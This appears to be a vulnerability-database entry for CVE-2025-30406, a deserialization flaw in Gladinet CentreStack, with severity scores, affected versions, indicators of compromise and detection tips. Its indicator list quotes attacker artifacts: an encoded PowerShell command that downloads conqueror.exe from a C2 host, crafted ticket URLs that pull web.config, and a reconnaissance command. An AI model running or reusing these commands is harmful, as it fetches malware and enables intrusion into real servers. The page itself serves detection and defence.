cbcvebase.
CVE-2025-30406
published 2025-04-03

CVE-2025-30406: Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-04-29
Exploited in the wild
EPSS
92.73%
99.8th percentile
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\web.config.

Affected

1 ranges
VendorProductVersion rangeFixed in
gladinetcentrestack< 16.4.10315.5636816.4.10315.56368

Detection & IOCsextracted from sources · hover to see the quote

ip185.196.11.207
urlhttp://185.196.11.207:8000/conqueror.exe
pathC:\Users\Public\conqueror.exe
filenameconqueror.exe
hashe9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5
ip146.70.134.50
ip147.124.216.205
command"C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
url/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
url/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY
url/storage/filesvr.dn?t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr
pathC:\Program Files (x86)\Gladinet Cloud Enterprise\root\web.config
commandipconfig /all > "C:\programdata\CentreStac_log.txt"
processw3wp.exe
  • Monitor Windows Application Event Log for Event ID 1316, which captures ViewState deserialization attack payloads (base64-encoded) submitted to the CentreStack portal.
  • Alert on child process creation from w3wp.exe spawning cmd.exe or powershell.exe, which indicates server-side code execution via ViewState deserialization.
  • Detect HTTP GET requests to /storage/filesvr.dn with a 't' parameter containing long base64-like encrypted ticket strings — these are exploitation attempts to download web.config via the hardcoded AES key.
  • Flag access tickets in /storage/filesvr.dn requests that decrypt to a timestamp in the year 9999, indicating a crafted never-expiring ticket used by attackers to persistently download web.config.
  • Hunt for the file C:\programdata\CentreStac_log.txt on CentreStack servers, which attackers created to exfiltrate ipconfig /all output via the LFI vulnerability.
  • ·The conqueror.exe payload (SHA256: e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5) was not present on the file system for further analysis and was not found on VirusTotal at time of writing; the C2 server at 185.196.11.207:8000 was also offline, limiting further artifact recovery.
  • ·Attribution to the cl0p ransomware group for the December 15 incidents could not be definitively confirmed at time of reporting; Huntress flagged it as suspected based on timing of external intelligence reports.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.